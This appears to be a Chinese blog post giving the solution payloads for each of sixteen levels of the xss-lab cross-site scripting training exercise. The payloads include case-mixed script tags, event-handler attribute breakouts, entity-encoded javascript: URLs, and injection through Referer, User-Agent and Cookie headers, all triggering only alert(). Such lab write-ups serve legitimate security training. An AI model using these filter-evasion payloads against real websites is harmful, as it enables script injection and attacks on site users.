xss注入实验(xss-lab)

  • xss-lab
  1. 第一关

代码:<Script>alert(1)</Script>

  1. 第二关

代码:1"><ScRipt>alert(1)</ScRipt>

  1. 第三关

代码:' onclick ='javascript:alert(1)'//

  1. 第四关

代码:" onclick ="javascript:alert(1)"//

  1. 第五关

代码:"></input><a href='javascript:alert(1)'>www</a>//

  1. 第六关

代码:1"><ScRipt>alert(1)</ScRipt>

  1. 第七关

代码:1"><ScscriptRipt>alert(1)</ScscriptRipt>

  1. 第八关

代码:

复制代码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
  1. 第九关

代码:

复制代码
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x31;&#x27;&#x29; //http://www.baidu.com
  1. 第十关

代码:&t_sort=" type='text' οnclick='javascript:alert(1)'>//

  1. 第十一关

代码:添加referer字段:'" type='text' οnblur='javascript:alert("aini")'

  1. 第十二关

代码:更改user-agents字段:user-agent:'" type='text' οnclick='alert(123)'

  1. 第十三关

代码:Cookie: '" type='text' οnclick='alert(123)'

  1. 第十四关

代码:直接更改url,重定向到15关

  1. 第十五关

代码:?src='level1.php?name=<p οnmοusedοwn=alert()>哈哈哈</p>'

  1. 第十六关

代码:keyword=<img%0Dsrc=1%0Dοnerrοr=alert(1)>

相关推荐
EasyDSS2 分钟前
智能会议管理系统/私有化视频会议平台EasyDSS私有化部署构建企业级私域视频全场景解决方案
人工智能·音视频
码事漫谈11 分钟前
手把手带你部署本地模型,让你Token自由(小白专属)
前端·后端
zhanghongbin0113 分钟前
成本追踪:AI API 成本计算与预算管理
人工智能
ZC跨境爬虫15 分钟前
【爬虫实战对比】Requests vs Scrapy 笔趣阁小说爬虫,从单线程到高效并发的全方位升级
前端·爬虫·scrapy·html
爱上好庆祝16 分钟前
svg图片
前端·css·学习·html·css3
YBAdvanceFu17 分钟前
从零构建智能体:深入理解 ReAct Plan Solve Reflection 三大经典范式
人工智能·python·机器学习·数据挖掘·多智能体·智能体
啦啦啦在冲冲冲24 分钟前
多头注意力机制的优势是啥,遇到长文本的情况,可以从哪些情况优化呢
人工智能·深度学习
xrgs_shz26 分钟前
直方图法、最大类间方差法、迭代法和自适应阈值法的图像分割的基本原理和MATLAB实现
人工智能·计算机视觉·matlab
向上的车轮31 分钟前
如何定制大模型——工业场景下大模型定制与私有化部署选型
人工智能
王夏奇34 分钟前
python中的__all__ 具体用法
java·前端·python